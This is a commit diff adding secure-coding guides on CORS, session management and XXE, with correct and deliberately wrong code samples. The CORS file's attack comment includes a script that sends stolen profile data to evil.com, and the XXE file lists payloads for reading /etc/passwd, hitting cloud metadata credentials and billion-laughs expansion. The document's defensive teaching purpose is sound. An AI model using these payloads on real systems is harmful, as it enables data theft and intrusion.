Add session management, CORS, XXE patterns

Complete the security patterns collection: - session-management.md: fixation, hijacking, secure cookies, concurrent sessions - cors.md: origin validation, reflected origin attacks, preflight caching - xxe.md: external entities, DTD attacks, language-specific fixes Now 19 patterns covering comprehensive web application security.
2026-05-10 23:20:36 -07:00
parent 5b9f30e663
commit 17c535bc61
4 changed files with 556 additions and 4 deletions
@@ -20,13 +20,14 @@ Based on OWASP Top 10:2025 and recent security research.
 | [audit-logging.md](audit-logging.md) | What to log, what not to log | A09 |
 | [error-handling.md](error-handling.md) | Fail closed, no sensitive info in errors | A10 |
-### Identity
+### Identity & Session
 | File | Topic | OWASP 2025 |
 |------|-------|------------|
 | [authentication.md](authentication.md) | Passwords, tokens, MFA, brute force protection | A07 |
 | [authorization.md](authorization.md) | Permission checks, IDOR prevention, privilege escalation | A01 |
 | [jwt-security.md](jwt-security.md) | Algorithm confusion, weak secrets, expiration | A07 |
 | [session-management.md](session-management.md) | Session fixation, hijacking, secure cookies | A07 |
 ### Attack Prevention
@@ -34,10 +35,12 @@ Based on OWASP Top 10:2025 and recent security research.
 |------|-------|------------|
 | [injection-prevention.md](injection-prevention.md) | SQL, command, template, path traversal | A05 |
 | [ssrf.md](ssrf.md) | Server-side request forgery, metadata endpoints | A10 |
 | [xxe.md](xxe.md) | XML external entities, DTD attacks | A05 |
 | [dos-prevention.md](dos-prevention.md) | Rate limiting, resource bounds, algorithmic complexity | — |
 | [prompt-injection.md](prompt-injection.md) | LLM security, data/instruction separation | — |
 | [deserialization.md](deserialization.md) | Untrusted data deserialization, pickle, yaml | A08 |
 | [race-conditions.md](race-conditions.md) | TOCTOU, atomic check-and-act, database locks | — |
 | [cors.md](cors.md) | Origin validation, credential handling | A01 |
 ### Infrastructure
@@ -50,13 +53,13 @@ Based on OWASP Top 10:2025 and recent security research.
 | # | Category | Pattern |
 |---|----------|---------|
-| A01 | Broken Access Control | authorization.md |
+| A01 | Broken Access Control | authorization.md, cors.md |
 | A02 | Security Misconfiguration | secure-defaults.md |
 | A03 | Software Supply Chain Failures | supply-chain.md |
 | A04 | Cryptographic Failures | cryptography.md |
-| A05 | Injection | injection-prevention.md |
+| A05 | Injection | injection-prevention.md, xxe.md |
 | A06 | Insecure Design | secure-defaults.md |
-| A07 | Authentication Failures | authentication.md, jwt-security.md |
+| A07 | Authentication Failures | authentication.md, jwt-security.md, session-management.md |
 | A08 | Software or Data Integrity Failures | deserialization.md |
 | A09 | Security Logging and Alerting Failures | audit-logging.md |
 | A10 | Mishandling of Exceptional Conditions | error-handling.md, ssrf.md |
@@ -0,0 +1,183 @@
 # CORS Misconfiguration
 ## Rule
 Never reflect Origin blindly. Allowlist specific origins. Don't use credentials with wildcards.
 **Source:** [OWASP CORS Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)
 ## CORS Basics
 Browser blocks cross-origin requests by default. CORS headers selectively allow them:
 | Header | Purpose |
 |--------|---------|
 | `Access-Control-Allow-Origin` | Which origins can access |
 | `Access-Control-Allow-Credentials` | Allow cookies/auth |
 | `Access-Control-Allow-Methods` | Allowed HTTP methods |
 | `Access-Control-Allow-Headers` | Allowed request headers |
 ## Correct Pattern
 ```python
 from flask import Flask, request
 ALLOWED_ORIGINS = {
    "https://app.example.com",
    "https://admin.example.com",
 }
 def add_cors_headers(response):
    origin = request.headers.get("Origin")
    # Validate against allowlist
    if origin in ALLOWED_ORIGINS:
        response.headers["Access-Control-Allow-Origin"] = origin
        response.headers["Access-Control-Allow-Credentials"] = "true"
        response.headers["Access-Control-Allow-Methods"] = "GET, POST, PUT, DELETE"
        response.headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization"
        response.headers["Vary"] = "Origin"  # Important for caching!
    return response
 # For public APIs without credentials
 def add_public_cors(response):
    response.headers["Access-Control-Allow-Origin"] = "*"
    # Note: credentials CANNOT be used with wildcard
    response.headers["Access-Control-Allow-Methods"] = "GET"
    return response
 # Handle preflight requests
@app.route("/api/<path:path>", methods=["OPTIONS"])
 def preflight(path):
    response = make_response()
    return add_cors_headers(response)
 ```
 ## Incorrect Pattern
 ```python
 # Wrong: reflect any origin (allows any site to access)
@app.after_request
 def bad_cors(response):
    origin = request.headers.get("Origin")
    response.headers["Access-Control-Allow-Origin"] = origin  # Reflected!
    response.headers["Access-Control-Allow-Credentials"] = "true"
    return response
    # Attack: evil.com can now make authenticated requests
 # Wrong: wildcard with credentials
 response.headers["Access-Control-Allow-Origin"] = "*"
 response.headers["Access-Control-Allow-Credentials"] = "true"
 # Browser will reject, but shows misunderstanding
 # Wrong: regex bypass
 def check_origin(origin):
    return origin.endswith(".example.com")
    # Bypassed by: attacker-example.com
 # Wrong: null origin allowed
 ALLOWED_ORIGINS = {"https://app.example.com", "null"}
 # "null" origin sent by sandboxed iframes, file:// URLs - attacker controlled!
 # Wrong: substring match
 def check_origin(origin):
    return "example.com" in origin
    # Bypassed by: example.com.evil.com
 ```
 ## Origin Validation
 ```python
 from urllib.parse import urlparse
 ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}
 def is_valid_origin(origin: str) -> bool:
    """Strict origin validation."""
    if not origin:
        return False
    # Never allow null
    if origin == "null":
        return False
    # Exact match against allowlist
    if origin in ALLOWED_ORIGINS:
        return True
    # If you need subdomain matching, be careful:
    try:
        parsed = urlparse(origin)
        # Must be HTTPS
        if parsed.scheme != "https":
            return False
        # Exact domain match (not suffix!)
        allowed_domains = {"app.example.com", "admin.example.com"}
        if parsed.netloc in allowed_domains:
            return True
        # Subdomain of specific parent (careful!)
        if parsed.netloc.endswith(".trusted.example.com"):
            # Verify it's actually a subdomain, not suffix attack
            parts = parsed.netloc.split(".")
            if len(parts) >= 4 and parts[-3:] == ["trusted", "example", "com"]:
                return True
    except Exception:
        return False
    return False
 ```
 ## Attack Scenarios
 ```python
 # Scenario 1: Data theft via reflected origin
 # 
 # Vulnerable server reflects any Origin with credentials
 # 
 # Attacker's evil.com:
 # <script>
 # fetch("https://api.victim.com/user/profile", {
 #     credentials: "include"
 # })
 # .then(r => r.json())
 # .then(data => {
 #     // Send stolen data to attacker
 #     fetch("https://evil.com/steal?data=" + JSON.stringify(data))
 # })
 # </script>
 # Scenario 2: CSRF via CORS
 #
 # If CORS allows credentials from evil.com,
 # evil.com can make authenticated state-changing requests
 ```
 ## Preflight Caching
 ```python
@app.after_request
 def cors_headers(response):
    origin = request.headers.get("Origin")
    if origin in ALLOWED_ORIGINS:
        response.headers["Access-Control-Allow-Origin"] = origin
        response.headers["Access-Control-Allow-Credentials"] = "true"
        response.headers["Access-Control-Max-Age"] = "86400"  # Cache preflight 24h
        response.headers["Vary"] = "Origin"  # CRITICAL for caching
    return response
 # Why Vary: Origin matters:
 # Without it, CDN might cache response for origin A
 # Then serve that cached response to origin B (wrong ACAO header!)
 ```
 ## Edge Cases
 - WebSocket connections don't use CORS (use Origin header manually)
 - `Access-Control-Expose-Headers` needed for custom response headers
 - Preflight not sent for "simple" requests (GET, POST with basic headers)
 - Internal APIs should still validate Origin (defense in depth)
 - Browser extensions can bypass CORS (not a vulnerability)
 - Server-to-server requests don't involve CORS
@@ -0,0 +1,185 @@
 # Session Management
 ## Rule
 Generate unpredictable session IDs. Bind sessions to users. Expire aggressively. Regenerate on privilege change.
 **Source:** [OWASP Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)
 ## Session Attacks
 | Attack | Description | Defense |
 |--------|-------------|---------|
 | Session fixation | Attacker sets victim's session ID | Regenerate on login |
 | Session hijacking | Steal session via XSS/network | httpOnly, Secure flags |
 | Session prediction | Guess valid session IDs | Cryptographic randomness |
 | Session replay | Reuse captured session | Short expiration, binding |
 ## Correct Pattern
 ```python
 import secrets
 from datetime import datetime, timedelta
 from flask import session, request
 # Generate cryptographically secure session ID
 def generate_session_id() -> str:
    return secrets.token_urlsafe(32)  # 256 bits of entropy
 # Session configuration
 SESSION_CONFIG = {
    "cookie_name": "__Host-session",  # __Host- prefix enforces Secure + no Domain
    "httponly": True,      # Not accessible to JavaScript
    "secure": True,        # HTTPS only
    "samesite": "Lax",     # CSRF protection
    "max_age": 3600,       # 1 hour max
 }
 # Regenerate session on privilege change
 def login(user: User, password: str) -> bool:
    if not verify_password(user, password):
        return False
    # CRITICAL: regenerate session ID to prevent fixation
    session.regenerate()
    session["user_id"] = user.id
    session["login_time"] = datetime.utcnow().isoformat()
    session["ip"] = request.remote_addr
    session["user_agent"] = request.user_agent.string
    return True
 def logout():
    # Invalidate server-side, not just client cookie
    session_id = session.get("_id")
    if session_id:
        invalidate_session_server_side(session_id)
    session.clear()
 # Validate session binding
 def validate_session() -> bool:
    if "user_id" not in session:
        return False
    # Check session age
    login_time = datetime.fromisoformat(session.get("login_time", ""))
    if datetime.utcnow() - login_time > timedelta(hours=8):
        logout()
        return False
    # Optional: bind to IP (careful with mobile/proxies)
    # if session.get("ip") != request.remote_addr:
    #     logout()
    #     return False
    return True
 ```
 ## Incorrect Pattern
 ```python
 import random
 import hashlib
 # Wrong: predictable session ID
 def bad_session_id():
    return str(random.randint(1000000, 9999999))
 # Wrong: sequential session ID
 COUNTER = 0
 def bad_session_id_2():
    global COUNTER
    COUNTER += 1
    return str(COUNTER)
 # Wrong: user-derived session ID
 def bad_session_id_3(user_id):
    return hashlib.md5(str(user_id).encode()).hexdigest()
 # Wrong: no regeneration on login (session fixation)
 def bad_login(user, password):
    if verify_password(user, password):
        session["user_id"] = user.id  # Same session ID!
        return True
    return False
 # Wrong: client-side only logout
 def bad_logout():
    return redirect("/", headers={"Set-Cookie": "session=; Max-Age=0"})
    # Session still valid server-side!
 # Wrong: missing cookie security flags
 app.config["SESSION_COOKIE_HTTPONLY"] = False  # XSS can steal
 app.config["SESSION_COOKIE_SECURE"] = False    # Sent over HTTP
 ```
 ## Session Fixation Attack
 ```python
 # Attack scenario:
 # 1. Attacker visits site, gets session ID "abc123"
 # 2. Attacker sends victim link: https://site.com/?sessionid=abc123
 # 3. Victim clicks, their browser now uses "abc123"
 # 4. Victim logs in (session ID unchanged!)
 # 5. Attacker uses "abc123" - now authenticated as victim
 # Defense: ALWAYS regenerate on login
@app.route("/login", methods=["POST"])
 def login():
    if authenticate(request.form):
        session.regenerate()  # New session ID
        session["authenticated"] = True
    return redirect("/")
 ```
 ## Concurrent Session Control
 ```python
 # Limit active sessions per user
 MAX_SESSIONS_PER_USER = 3
 def create_session(user_id: str) -> str:
    # Get existing sessions
    existing = Session.query.filter_by(user_id=user_id).order_by(
        Session.created_at.asc()
    ).all()
    # Remove oldest if at limit
    if len(existing) >= MAX_SESSIONS_PER_USER:
        oldest = existing[0]
        oldest.delete()
        # Optionally notify user: "Logged out of oldest session"
    # Create new session
    session_id = generate_session_id()
    Session.create(
        id=session_id,
        user_id=user_id,
        created_at=datetime.utcnow(),
        ip=request.remote_addr
    )
    return session_id
 # Allow user to view/revoke sessions
@app.route("/settings/sessions")
 def list_sessions():
    sessions = Session.query.filter_by(user_id=current_user.id).all()
    return render_template("sessions.html", sessions=sessions)
@app.route("/settings/sessions/<session_id>/revoke", methods=["POST"])
 def revoke_session(session_id):
    session = Session.query.get(session_id)
    if session and session.user_id == current_user.id:
        session.delete()
    return redirect("/settings/sessions")
 ```
 ## Edge Cases
 - Mobile apps: use short-lived access tokens, not sessions
 - "Remember me": separate long-lived token, not extended session
 - Password change should invalidate all other sessions
 - Admin impersonation needs audit trail
 - Idle timeout vs absolute timeout (both needed)
 - Session data size limits (don't store large objects)
@@ -0,0 +1,181 @@
 # XML External Entities (XXE)
 ## Rule
 Disable external entity processing. Disable DTDs. Use safe parser defaults.
 **Source:** [OWASP XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
 ## What XXE Can Do
 - **File disclosure**: Read `/etc/passwd`, config files, source code
 - **SSRF**: Make requests to internal services
 - **DoS**: Billion laughs attack (exponential entity expansion)
 - **Port scanning**: Error-based probing of internal ports
 - **RCE**: In some configurations (PHP expect://)
 ## Attack Payloads
 ```xml
 <!-- File disclosure -->
 <?xml version="1.0"?>
 <!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
 ]>
 <data>&xxe;</data>
 <!-- SSRF to cloud metadata -->
 <?xml version="1.0"?>
 <!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
 ]>
 <data>&xxe;</data>
 <!-- Billion laughs DoS -->
 <?xml version="1.0"?>
 <!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- ... continues exponentially -->
 ]>
 <lolz>&lol9;</lolz>
 ```
 ## Correct Pattern
 ```python
 # Python - defusedxml (recommended)
 import defusedxml.ElementTree as ET
 def parse_xml_safe(xml_string: str):
    """Parse XML with XXE protection."""
    return ET.fromstring(xml_string)
 # Python - standard library with safe settings
 from xml.etree.ElementTree import XMLParser, parse
 import xml.etree.ElementTree as ET
 def parse_xml_manual(xml_string: str):
    """Manual safe configuration."""
    parser = ET.XMLParser()
    # Python's ElementTree doesn't resolve external entities by default
    # But always verify your specific library!
    return ET.fromstring(xml_string, parser=parser)
 # lxml with safe settings
 from lxml import etree
 def parse_xml_lxml(xml_string: str):
    """lxml with XXE disabled."""
    parser = etree.XMLParser(
        resolve_entities=False,
        no_network=True,
        dtd_validation=False,
        load_dtd=False,
    )
    return etree.fromstring(xml_string.encode(), parser=parser)
 ```
 ## Incorrect Pattern
 ```python
 from lxml import etree
 # Wrong: default lxml settings allow XXE
 def bad_parse(xml_string: str):
    return etree.fromstring(xml_string)
 # Wrong: explicitly enabling dangerous features
 def bad_parse_2(xml_string: str):
    parser = etree.XMLParser(resolve_entities=True)
    return etree.fromstring(xml_string, parser=parser)
 # Wrong: using xml.dom.minidom without protection
 from xml.dom.minidom import parseString
 def bad_parse_3(xml_string: str):
    return parseString(xml_string)  # May be vulnerable
 # Wrong: SAX parser without disabling features
 import xml.sax
 def bad_parse_4(xml_string: str):
    handler = MyHandler()
    xml.sax.parseString(xml_string, handler)
 ```
 ## Language-Specific Fixes
 ### Java
 ```java
 // DocumentBuilderFactory
 DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
 dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
 dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
 dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
 dbf.setXIncludeAware(false);
 dbf.setExpandEntityReferences(false);
 // SAXParserFactory
 SAXParserFactory spf = SAXParserFactory.newInstance();
 spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
 spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
 spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
 ```
 ### .NET
 ```csharp
 // XmlReader (safe by default in .NET 4.5.2+)
 XmlReaderSettings settings = new XmlReaderSettings();
 settings.DtdProcessing = DtdProcessing.Prohibit;
 settings.XmlResolver = null;
 XmlReader reader = XmlReader.Create(stream, settings);
 // XmlDocument
 XmlDocument doc = new XmlDocument();
 doc.XmlResolver = null;  // Disable external resources
 doc.LoadXml(xmlString);
 ```
 ### PHP
 ```php
 // Disable entity loading globally
 libxml_disable_entity_loader(true);
 // Use LIBXML options
 $doc = new DOMDocument();
 $doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_DTDATTR);
 // Actually, better to just not use those flags:
 $doc->loadXML($xml, LIBXML_NONET);
 ```
 ## When You Need DTDs
 ```python
 # If you absolutely need DTD validation (rare):
 # 1. Allowlist specific DTDs
 # 2. Fetch DTDs from local filesystem only
 # 3. Never allow user-controlled DTD URLs
 ALLOWED_DTDS = {
    "-//W3C//DTD XHTML 1.0 Strict//EN": "/path/to/local/xhtml1-strict.dtd"
 }
 class SafeResolver(etree.Resolver):
    def resolve(self, system_url, public_id, context):
        if public_id in ALLOWED_DTDS:
            return self.resolve_filename(ALLOWED_DTDS[public_id], context)
        raise ValueError(f"DTD not allowed: {public_id}")
 ```
 ## Edge Cases
 - SVG files are XML — validate uploads!
 - SOAP/XML-RPC endpoints are XXE targets
 - Office documents (DOCX, XLSX) contain XML
 - Configuration files (Maven pom.xml, Spring beans.xml)
 - RSS/Atom feeds
 - SAML assertions
 - Blind XXE (out-of-band data exfiltration via DNS/HTTP)